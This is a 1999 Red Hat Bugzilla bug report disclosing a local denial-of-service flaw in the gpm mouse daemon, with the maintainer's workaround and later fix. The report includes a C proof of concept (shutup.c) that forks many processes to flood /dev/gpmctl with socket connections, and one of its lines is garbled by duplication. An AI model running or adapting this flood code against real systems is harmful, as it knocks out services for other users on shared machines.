Note: This is a beta release of Red Hat Bugzilla 5.0. The data contained within is a snapshot of the live data so any changes you make will not be reflected in the production Bugzilla. Also email is disabled so feel free to test any aspect of the site that you want. File any problems you find or give feedback here.
Bug 7478 - DoS in gpm
Summary: DoS in gpm
Keywords:
Status: CLOSED RAWHIDE
Alias: None
Product: Red Hat Linux
Classification: Retired
Component: gpm
Version: 6.1
Hardware: i386
OS: Linux
medium
medium
Target Milestone: ---
Assignee: Bernhard Rosenkraenzer
QA Contact:
URL:
Whiteboard:
Depends On:
Blocks:
TreeView+ depends on / blocked
 
Reported: 1999-12-01 13:25 UTC by cadence
Modified: 2008-05-01 15:37 UTC (History)
0 users

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Clone Of:
Environment:
Last Closed: 2000-01-13 22:14:56 UTC


Attachments (Terms of Use)

Description cadence 1999-12-01 13:25:43 UTC
Hello.

There is simmilar to sysklogd bug in gpm.
It listening on /dev/gpmctl and uses STREAM.

Any user can simply DoS the gpm and (in several circumstances) the whole
system.

Below is the sample code to DoS the gpm.
I couldn't write an exploit to ALWAYS crash the whole system, but I did it
few times. I don't know why it works and why not.
I think that You are much better programmers than I so You can do it
Yourself :)
If i will write working exploit I will NOT public it, so don't worry.


Solutions?
I don't sure if the STREAM is needed by gpm. Maybe DGRAM will be good
solution for that?
Or maybe some changes of permissions on /dev/gpmctl?

Best regards.

Tomasz Grabowski  (0-91)4333950
Akademickie Centrum Informatyki
mailto:cadence@man.szczecin.pl


-------------------------------------------------------------------------

Below is the shutup.c writen by someone else.
I made only few little changes to work with gpm.


#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/un.h>

#define PATH    "/dev/gpmctl"
#define SHUTUPS 2000
#define PROCS   100

int
main (void)
{
  int s, i;
  struct sockaddr_un sun;
  char host[128];
sockaddr_un sun;
  char host[128];

  sun.sun_family = AF_UNIX;
  strncpy (sun.sun_path, PATH, 100);
  gethostname (host, 128);

  if (fork ())
    exit (0);

  for (i = 0; i < PROCS; i++)
    if (fork () == 0)
      break;

  for (i = 0; i < SHUTUPS; i++)
    {
      if ((s = socket (AF_UNIX, SOCK_STREAM, 0)) < 0)
        {
          perror ("socket");
          while (1);
        }

      if (connect (s, (struct sockaddr *) &sun, sizeof (struct sockaddr)) <
0)
        {
          perror ("connect");
          close (s);
          i--;
        }
    }

  while (1);
}

Comment 1 Bernhard Rosenkraenzer 1999-12-01 15:20:59 UTC
gpm does need STREAM. There's no easy fix for this one.
If you change permissions on /dev/gpmctl, you lose functionality.

The quickfix is to just rm /dev/gpmctl.
This will prevent things like gpm-root from working, but basic gpm functionality
is still there.

I'm looking at it to see if/how it can be fixed without losing functionality.

Comment 2 Bernhard Rosenkraenzer 2000-06-15 21:25:11 UTC
Fixed.


Note You need to log in before you can comment on or make changes to this bug.